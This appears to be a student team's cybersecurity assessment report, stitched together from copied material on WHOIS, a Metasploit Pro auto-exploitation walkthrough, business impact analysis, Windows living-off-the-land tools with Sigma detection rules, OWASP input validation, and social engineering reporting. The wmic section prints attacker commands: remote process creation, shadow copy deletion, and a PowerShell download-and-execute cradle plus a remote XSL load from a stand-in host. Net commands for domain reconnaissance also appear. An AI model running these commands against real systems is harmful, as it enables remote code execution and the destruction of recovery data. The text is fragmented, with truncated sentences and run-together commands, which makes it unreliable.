Wireless Network Security 2
Wireless Network Security 2
Wireless Network Security 2
AssessmeNt
Cyber security
Project doNe by our teAm member
2. VULNERABILITY IDENTIFICATION
• Identify And Name Each Vulnerability
• Web Application Security Project (OWASP) Description For Each
Vulnerability
• Understanding And Defining Vulnerabilities
• Identifying And Naming Vulnerabilities
• Assigning CWE Codes To Each Vulnerabilities
• Providing OWASP Category And Description For Each
Vulnerabilities
1. Email Metadata: This includes information such as email addresses of senders and
recipients, date and time of communication, subject lines, and any CC or BCC
information. Analysing metadata can reveal patterns, frequency of communication,
and potential connections between individuals or groups.
2. Email Content: The actual text and attachments in emails can provide valuable
information about the topics discussed, the sender's writing style, and any potential
sensitive or confidential information that might have been shared.
1. Firewall and IDS/IPS Rules: DNS information helps security administrators create
and update firewall rules and intrusion detection/prevention system (IDS/IPS)
signatures to block malicious domains or IP addresses.
2. Monitoring DNS Traffic: Analysing DNS query and response data helps in
identifying DNS tunnel, data exfiltration, and other covert communication channels
used by attackers.
WHOIS Information Gathering
WHOIS information gathering is a vital aspect of cybersecurity, as it provides valuable data
about domain names and their owners. WHOIS is a protocol used to query databases
containing registration information for domain names. When someone registers a domain,
they need to provide certain contact details, including the domain owner's name,
organization, email address, physical address, and phone number. This information can be
accessed through WHOIS queries and plays a significant role in cybersecurity for the
following reasons:
Vulnerability Identification
Working with the Vulnerability Validation Wizard
Metasploit Pro simplifies and streamlines the vulnerability validation process. It provides a
guided interface, called the Vulnerability Validation Wizard, that walks you through each step
of the vulnerability validation process—from importing Nexpose data to auto-exploiting
vulnerabilities to sending the validation results back to Nexpose. You can even define
exceptions for vulnerabilities that were not successfully exploited and generate a report that
details the vulnerability testing results directly from Metasploit Pro.
When you launch the Vulnerability Validation Wizard, you will need to configure the settings
for the following tasks:
• Creating a project.
• Scanning or importing Nexpose sites.
• Tagging Nexpose assets. (Optional)
• Auto-exploiting vulnerabilities.
• Generating a report. (Optional)
You must also have at least one site set up in Nexpose. To learn how to set up a site,
please view the Nexpose documentation.
4. When the Configure a Nexpose Console page appears, enter the following
information:
• Console Address - The IP address to the server that runs Nexpose. You can also
specify the server name.
• Console Port - The port that runs the Nexpose service. The default port is 3780.
• Console Username - The Nexpose username that will be used to log in to the
console.
• Console Password - The Nexpose password that will be used to authenticate the
user account.
2. In the Project Name field, enter a name for the project. The project name can contain
any combination of alphanumeric characters, special characters, and spaces. You
can also provide an optional description for the project, which typically explains the
purpose and scope of the test.
3. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
4. Click the Nexpose Console dropdown and select the console that you want to pull
data from. If there are no consoles available, you can click the Configure a Nexpose
Console link to add one.
5. After you select a console, you can choose whether you want to run a Nexpose scan
or import existing Nexpose data. Depending on the option you choose, the wizard will
show the appropriate configuration page.
6. Select the Start a Nexpose Scan to get data option.
7. Enter the host addresses, or assets, that you want to scan in the Scan targets field.
You can enter a single IP address, a comma separated list of IP addresses, an IP
range described with hyphens, or a standard CIDR notation.
8. Click the Scan template dropdown and select the template you want to use.
A scan template is a predefined set of scan options. There are a few default ones that you
can choose from. For more information on each scan template, please see the Nexpose
documentation.
10. Select the Automatically tag by OS option if you want to tag each host with its
operating system.
12. After you configure the tagging options, click on the Exploit tab. The Auto-
Exploitation page appears.
13. Click the Minimum Reliability dropdown and choose the module ranking you want to
use. You should use Great or Excellent.
14. Use any of the following options to configure exploitation settings:
o Dry Run - Prints a transcript of the exploits in the attack plan without running
them.
o Collect Evidence - Collects loot, such as screenshots, system files,
passwords, and configuration settings from open sessions.
o Clean Up Sessions - Closes all sessions after all tasks have run.
o Payload Type - Specifies the type of payload that the exploit will deliver to the
target. Choose one of the following payload types:
▪ Command - A command execution payload that enables you to
execute commands on the remote machine.
▪ Meterpreter - An advanced payload that provides a command line that
enables you to deliver commands and inject extensions on the fly.
o Connection Type - Specifies how you want your Metasploit instance to
connect to the target. Choose one of the following connection types:
▪ Auto - Automatically uses a bind connection when NAT is detected;
otherwise, a reverse connection is used.
▪ Bind - Uses a bind connection, which is useful when the targets are
behind a firewall or a NAT gateway.
▪ Reverse - Uses a reverse connection, which is useful if your system is
unable to initiate connections to the targets.
o Listener Ports - Defines the ports that you want to use for reverse
connections.
o Listener Host - Defines the IP address you want to connect back to.
o Auto Launch Macro - Specifies the macro that you want to run during post-
exploitation.
o Concurrent Exploits - Specifies the number of exploit attempts you want to
launch at one time.
o Timeout in Minutes - Defines the number of minutes an exploit waits before it
times out.
o Transport Evasion - Choose from the following transport evasion levels:
▪ Low - Inserts delays between TCP packets.
▪ Medium - Sends small TCP packets.
▪ High - Sends small TCP packets and inserts delays between them.
o Application Evasion - Adjusts application-specific evasion options for exploits
involving DCERPC, SMB and HTTP. The higher the application evasion level,
the more evasion techniques are applied.
o Included Ports - Defines the specific ports you want to target for exploitation.
o Excluded Ports - Defines the specific ports you want to exclude from
exploitation.
15. Click the Generate Report tab if you want to include an auto-generated report at the
end of the vulnerability validation test. If you do not want to include a report, deselect
the Generate Report option and skip to the last step.
16. Enter a name for the report in the Report Name field, if you want to use a custom
report name. Otherwise, the wizard uses an auto-generated report name.
17. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the
preferred and default format.
18. Click the Type dropdown and select the report type you want to generate. You can
choose the Audit report or the Compromised and Vulnerable Hosts report.
19. From the Sections area, deselect any sections you do not want to include in the
report. Skip this step if you want to generate all the report sections.
20. Enter any hosts, or assets, whose information you do not want included in the report
in the Excluded Addresses field. You can enter a single IP address, a comma
separated list of IP addresses, an IP range described with hyphens, or a standard
CIDR notation.
21. Select the Email Report option if you want to email the report after it generates. If
you enable this option, you need to supply a comma separated list of email
addresses.
If you want to email a report, you must set up a local mail server or email relay service for
Metasploit Pro to use. To define your mail server settings, select Administration > Global
Settings > SMTP Settings.
22. Click the Launch button. The Findings window appears and shows the statistics for
the test.
Readiness States for matched exploit modules are reported on the Remote exploit
matches table of the Findings window.
STEP - 3
Business Impact Assessment
What is a BIA?
A business impact analysis (BIA) is a systematic process to determine and evaluate
the potential effects of an interruption to critical business operations as a result of a
disaster, accident or emergency. A BIA is an essential component of an
organization's business continuance plan; it includes an exploratory component to
reveal any vulnerabilities and a planning component to develop strategies for
minimizing risk. The result is a business impact analysis report, which describes the
potential risks specific to the organization studied. One of the basic assumptions
behind BIA is that every component of the organization is reliant upon the continued
functioning of every other component, but that some are more crucial than others
and require a greater allocation of funds in the wake of a disaster. For example,
UCSF may be able to continue more or less normally if one of the cafes on campus
has to close, but would come to a complete halt if the information systems crash.
As part of a disaster recovery plan, a BIA is likely to identify costs linked to failures,
such as loss of cash flow, replacement of equipment, salaries paid to catch up with a
backlog of work, loss of profits, staff and data, and so on. A BIA report quantifies the
importance of business components and may suggest appropriate fund allocation for
measures to protect them. The possibilities of failures are likely to be assessed in
terms of their impacts in areas such as safety, finances, marketing, business
reputation, legal compliance and quality assurance and in this case IT resiliency.
Where possible, impact is expressed monetarily for purposes of comparison. For
example, UCSF may spend three times as much on recruiting potential students,
faculty and staff in the wake of a disaster to rebuild customer confidence. The BIA
should assess a disaster’s impact over time and help to establish recovery
strategies, priorities, and requirements for resources and time.
During the risk assessment phase, the BIA findings may be examined against
various hazard scenarios, and potential disruptions may be prioritized based on the
hazard’s probability and the likelihood of adverse impact to business operations. A
BIA may be used to justify investments in prevention and mitigation, as well as
disaster recovery strategies.
1. Cybersecurity Vulnerabilities:
Consequences:
- Data Breach: Unauthorized access to sensitive customer or company data can
Consequences:
- Inefficiency and Productivity Loss: Inadequate processes can result in wasted
time and resources, leading to decreased productivity and higher operational costs.
events, such as natural disasters or system failures, can cause significant downtime
Consequences:
- Fraud and Embezzlement: Poor financial controls may allow fraudulent
reputation.
- Cash Flow Issues: Inadequate financial planning and management can lead to
cash flow problems, impacting the ability to pay debts, suppliers, or employees.
- Financial Reporting Errors: Inaccurate financial reporting can result in legal and
Consequences:
- Employee Turnover: High turnover due to poor management or work
5. Reputational Vulnerabilities:
Consequences:
- Loss of Customer Trust: Negative publicity, whether due to a data breach or
other issues, can lead to customers losing trust in the company and seeking
alternatives.
Assessing the risk to the business involves evaluating the likelihood of a vulnerability being exploited
and the potential impact it could have on the organization. The risk assessment should take into account
factors such as the threat landscape, the value of the assets at risk, and the organization's current
security posture. By m chepali conducting a risk assessment, stakeholders can identify vulnerabilities
that pose the greatest risk to the organization and prioritize their remediation efforts. It is important to
conduct ongoing risk assessments to ensure that vulnerabilities are identified and addressed in a timely
manner.
STEP - 4
Vulnerability path and parameter
identification :
Methods For Identifying Vulnerability Paths And
Parameters:
9. User Behaviour Analysis: Monitoring user behaviour and access patterns can
help identify insider threats and potential vulnerabilities arising from human factors.
10. Bug Bounty Programs: Bug bounty programs offer rewards to independent
security researchers who identify and report vulnerabilities.
Such programs can provide valuable insights into potential paths and parameters
attackers might use.
11. Red Team Exercises: Red team exercises involve setting up a dedicated team
of cybersecurity experts to simulate real-world attacks on the organization's
systems. This can help identify unknown vulnerabilities and improve incident
response capabilities.
These assessments typically involve scanning the host system for known
vulnerabilities, such as missing security patches or outdated software. Host-based
vulnerability assessments can be performed using both automated and manual
methods.
5. Wireless Network Vulnerability Assessment
A wireless network vulnerability assessment focuses on identifying vulnerabilities in
wireless networks, including Wi-Fi networks. These assessments typically involve
testing the wireless network for common vulnerabilities, such as weak encryption,
default passwords, and rogue access points.
These assessments scan the cloud infrastructure for known vulnerabilities and test the
security of cloud applications and services.
2.Network Scanning
3.Penetration Testing
4.Vulnerability Scanning
1.Nessus
2.OpenVAS
3.Nmap
4.Metasploit
• /rl (level) : A value that sets the run level for the
task. Valid values are LIMITED and HIGHEST.
The default is LIMITED.
SIGMA Rules
You can detect this tool using the following sigma rules:
• win_susp_schtask_creation.yml
• win_rare_schtask_creation.yml
• win_powersploit_empire_schtasks.yml
Wmic (wmic.exe)
Attackers use this utility in a lot of different ways. You can kill
processes, search for process, delete shadow copies, execute
processes locally or remotely and so forth (its practically
limitless).
Here are just a couple of example on how this utility is often
used wmic /node:"Remote @IP" process call create "Malicious
File"wmic process where "name like '%$process%'"
deletewmic.exe shadowcopy deletewmic process where
ExecutablePath='Path to executable' deletewmic
/NODE:"COMPUTER NAME" /USER:"username"
/PASSWORD:"password" process call create "powershell.exe -
Command {IEX (New-Object
Net.Webclient).DownloadString('http://@IP/redacted.ps1')}
"wmic.e xe process get brief
/format:"\\127.0.0.1\c$\Tools\pocremote.xsl"wmic os get
/FORMAT:"https[:]//example[.]com/evil[.]xsl"
Note that WMI is used quite often by threat actors and malware.
“WMIC” is only half of the story. You can do magical stuff with
WMI and power shell.
SIGMA Rules
Depending on the context of the execution you can use multiple
sigma rules to detect the usage of “wmic”, below are a couple of
examples:
• win_susp_wmi_execution.yml
• win_xsl_script_processing.yml
• win_susp_eventlog_clear.yml
Net (net.exe)
This utility can be used to view shares, create users and groups,
discovery, view password policy…etc. Here are a couple of
commands executed by threat actors and malware :
net usernet group "domain admins" /domainnet group
"enterprise admins" /domainnet group "Domain Users"
/domainnet viewnet view /all /domainnet /stop [Service] /ynet
sharenet usersnet usenet use q: \\DomainController\DomainName
/user:DomainName\administrator [Password]net config
workstationnet localgroup usersnet localgroup /domain
Mshta (mshta.exe)
SIGMA Rules
You can detect this tool using the following sigma rules:
• win_mshta_javascript.yml
• win_mshta_spawn_shell.yml
Rundll32 (rundll32.exe)
As the name suggest, the “rundll32.exe” executable is used to
“RUN DLL’s” or Dynamic Link Libraries. I’ve blogged about it
in the past so go check it out to get a better understanding of
the how the tool work.
public void do Post ( Http Servlet Request , Http Service Response response) { try {
String zip Code = request .get Parameter( "zip" );if ( !zip Pattern .matcher( zip Code
).matches() {throw new Your Validation Exception( "Improper zip code format." );}//
do what you want here, after its been validated ..} catch(Your Validation Exception e )
{response .send Error( response. SC_BAD_REQUEST, e. get Message() );}}
Some Allow list validators have also been predefined in various open source packages
that you can leverage. For example:
Be aware that any JavaScript input validation performed on the client can be bypassed
by an attacker that disables JavaScript or uses a Web Proxy. Ensure that any input
validation performed on the client is also performed on the server.
It is very difficult to validate rich content submitted by a user. For more information,
please see the XSS cheat sheet on Sanitizing HTML Markup with a Library Designed for
the Job.
All user data controlled must be encoded when returned in the HTML page to prevent
the execution of malicious data (e.g. XSS). For example <script> would be returned as
& it script & gt
Challenges and limitations of vulnerability path and
parameter identification:
1. Complexity of Systems: Modern systems are complex and interconnected,
making it challenging to identify all potential paths and parameters that could lead to
vulnerabilities. This complexity increases with the use of cloud services, microservices
architecture, and Internet of Things (IoT) devices.
3. False Positives and Negatives: Vulnerability scanning and testing tools may
produce false positives (indicating vulnerabilities that don't exist) or false negatives
(missing actual vulnerabilities). This can lead to wasted time and effort in investigating
non-existent issues or overlooking critical vulnerabilities.
4. Lack of Access to Source Code: In many cases, organizations may not have
access to the source code of third-party software or libraries they use, making it
difficult to identify vulnerabilities within these components.
2. *Accuracy and Clarity:* Clear and detailed instructions help ensure that the
vulnerability is accurately understood by the organization's security team. Ambiguity
or lack of detail could lead to misinterpretation, delaying the resolution process.
2. *Affected System:* Clearly state the version and configuration of the software or
system where the vulnerability was discovered. This information helps the
organization's security team identify the specific system that needs attention.
6. *Observed Behaviour:* Describe the actual behaviour of the system when the
vulnerability was triggered. Detail any error messages, unexpected outputs, or
other indications of the vulnerability being present.
7. *Impact and Risk:* Assess and communicate the potential impact of the
vulnerability on the affected system or organization. Include information about the
possible risks and consequences if the vulnerability is exploited.
10. *Contact Information:* Provide your contact details, including email address or
any preferred means of communication, so that the organization's security team
can reach out for further clarification if needed.
11. *Disclosure Policy and Timeline:* If you are following a specific disclosure policy or
timeline, clearly state your intentions regarding public disclosure and the time
frame within which you expect the organization to address the vulnerability.
3. *Prepare the Tools:* Gather the necessary tools and scripts required to test
and verify the vulnerability. This may include network scanning tools, fussers,
debuggers, or custom scripts.
3. *Specific Details:* Provide specific details about the affected system, software
version, configurations, and any other prerequisites necessary to reproduce the
vulnerability accurately.
7. *Be Reproducible:* Test the instructions yourself to ensure that they can be
followed precisely to reproduce the vulnerability consistently.
8. *Include Screenshots and Logs:* Include relevant screenshots, error logs, or
network captures to supplement the instructions and provide visual evidence of the
vulnerability.
10. *Assume Limited Technical Knowledge:* Write the instructions with the
assumption that the reader may not have extensive technical knowledge. Provide
explanations for technical terms or concepts that may not be familiar to everyone.
2. *Code Review:* If the vulnerability fix involves changes to the software's source
code, conduct a thorough code review. This ensures that the fix is correctly
implemented, and there are no new security issues introduced during the code
changes.
3. *Unit Testing:* Developers can create unit tests specifically designed to assess the
effectiveness of the vulnerability fix. These tests target the specific code that was
vulnerable to verify that the fix mitigates the issue.
6. *Fuzz Testing:* Fuzz testing tools can be used to send random or unexpected
inputs to the application to test its resilience against potential exploitation
attempts. Running fuzz tests after the fix can reveal any vulnerabilities that were
not detected before.
STEP – 6
Comprehensive And Detailed Reporting: Importance Of
Comprehensive And Detailed Reporting
the necessary information to make informed choices. Whether it's evaluating the
resources, comprehensive reports ensure decisions are based on concrete data and
analysis.
strategies. This insight is crucial for taking corrective actions and implementing
continuous improvement. Organizations can use the findings to refine their strategies,
impacts.
are essential to demonstrate compliance with relevant laws and industry standards.
ensures everyone is on the same page regarding the organization's security status and
objectives.
9. *Learning From Mistakes:* Mistakes and incidents can be valuable learning
understand the root causes, and develop strategies to prevent similar occurrences in
the future.
10. *Supporting Business Cases:* Detailed reports can be used to make a business
case for new security initiatives or investments. They provide evidence and data to
Clearly state the purpose and objectives of the social engineering simulation. Define
the scope of the assessment, including the targets, departments, or individuals
involved in the exercise.
2. *Methodology:*
3. *Simulation Details:*
Provide a detailed account of each social engineering attempt made during the
simulation. Include the specifics of the messages sent (phishing emails, phone calls,
etc.), interactions with employees, and any successful attempts to gain access or
information.
4. *Success Rates:*
Present the success rates of each social engineering tactic used. Include statistics on
how many employees fell for phishing emails, shared sensitive information, or granted
physical access to unauthorized individuals.
5. *Vulnerabilities Exposed:*
Detail the vulnerabilities and weaknesses that were identified during the simulation.
This can include shortcomings in policies, procedures, employee training, or physical
security.
6. *Impact Analysis:*
Analyze the potential impact if the social engineering attempts were real and
conducted by malicious actors. Discuss the possible consequences and damages that
could have occurred.
relevant data, effective data analysis, clear and concise presentation of findings, and
Use clear and straightforward language in the report. Avoid technical jargon or overly
complex terminology that may be confusing to non-technical stakeholders. The goal is
to make the findings and recommendations easily understandable by a wide audience.
2. **Visual Representation:**
Utilize visual aids such as graphs, charts, and infographics to present data and
statistics effectively. Visual representations can help stakeholders grasp complex
information quickly and enhance the overall readability of the report.
3. **Executive Summary:**
Include an executive summary at the beginning of the report. This section should
provide a high-level overview of the assessment's objectives, key findings, and top-
level recommendations. It should be concise and actionable for busy executives.
Consider tailoring specific sections of the report to different audiences within the
organization. For example, technical teams might be interested in the methodology
and technical controls assessment, while management may focus more on the impact
analysis and strategic recommendations.
Use real-world scenarios and examples from the simulation to illustrate the
effectiveness of social engineering tactics and the potential impact on the
organization. Real-life examples can make the report more relatable and compelling.
Whenever possible, quantify the risks and potential impact of successful social
engineering attacks. This can help stakeholders understand the severity of the
identified vulnerabilities and the importance of taking appropriate measures.
Whenever possible, incorporate real data and examples from the simulation to
support your findings. Anecdotes and concrete evidence can lend credibility to the
report.
2. *Complexity of Assessment:*
Social engineering simulations can be multifaceted and involve various tactics, tools,
and scenarios. Capturing and analysing all the nuances and interactions during the
assessment can be challenging, especially when dealing with a large number of
participants.
Striking the right balance between technical details for security professionals and
non-technical language for management and stakeholders can be difficult.
It may not always be feasible to simulate all possible social engineering scenarios
due to resource and ethical limitations. The scope of the assessment needs to be
defined carefully to strike a balance between realism and responsible testing.
Ensuring the confidentiality and security of sensitive data collected during the
simulation can be challenging. It's crucial to handle and store information securely to
prevent any unintended disclosure.
Once the report is delivered, ongoing monitoring and follow-up are essential to
ensure that the identified vulnerabilities are addressed, and the organization
continues to improve its security posture.
1. *Informed Decision-Making:*
2. *Risk Awareness:*
The report highlights the specific social engineering risks the organization faces and
their potential impact. Decision-makers gain a deeper understanding of the potential
consequences of successful social engineering attacks, leading to a heightened sense of
risk awareness.
3. *Identification of Weaknesses:*
The report identifies weaknesses in policies, procedures, technical controls, and
security awareness training. Decision-makers can then target these weaknesses for
improvement, reducing the organization's overall risk exposure.
6. *Resource Allocation:*
The report's insights into policy and procedure weaknesses help decision-makers
update and strengthen security-related policies. They can introduce measures that
better mitigate social engineering risks and align with industry best practices.
2. *Establish a Methodology:*
Develop a clear and well-defined methodology for conducting the social engineering
simulation. Outline the specific social engineering tactics, tools, and techniques that
will be used during the assessment.
Design realistic social engineering scenarios that mimic potential real-world attacks.
Ensure that the simulation closely represents the tactics and techniques that threat
actors might employ.
During the simulation, maintain consistent and detailed records of all interactions,
responses, and outcomes. This data will form the basis for the comprehensive report.
Quantify the success rates of different social engineering tactics used during the
simulation. Use metrics and statistics to measure the level of employee engagement
and susceptibility to social engineering attempts.
Use graphs, charts, and infographics to visually represent data and findings. Visual
aids enhance the report's readability and help stakeholders grasp complex information
quickly.
Assess the potential impact if the social engineering attempts were successful.
Consider the consequences of sensitive information disclosure, unauthorized access,
and potential financial losses.
Identify the vulnerabilities and weaknesses exposed during the simulation. Clearly
outline areas that need improvement in policies, procedures, technical controls, and
security awareness training.
Acknowledge positive outcomes and best practices observed during the simulation.
Highlight employees who demonstrated excellent security awareness and behaviour.
15. *Ensure Data Privacy and Ethics:* Adhere to ethical standards and ensure data
privacy throughout the simulation and reporting process. Obtain informed consent
from participants and protect any sensitive data collected.
Begin the report with a concise executive summary that provides a high-level
overview of the assessment's objectives, key findings, and top-level recommendations.
Maintain a reporting template that can be updated and reused for future
assessments.
Regularly review and improve the template based on feedback and changing
requirements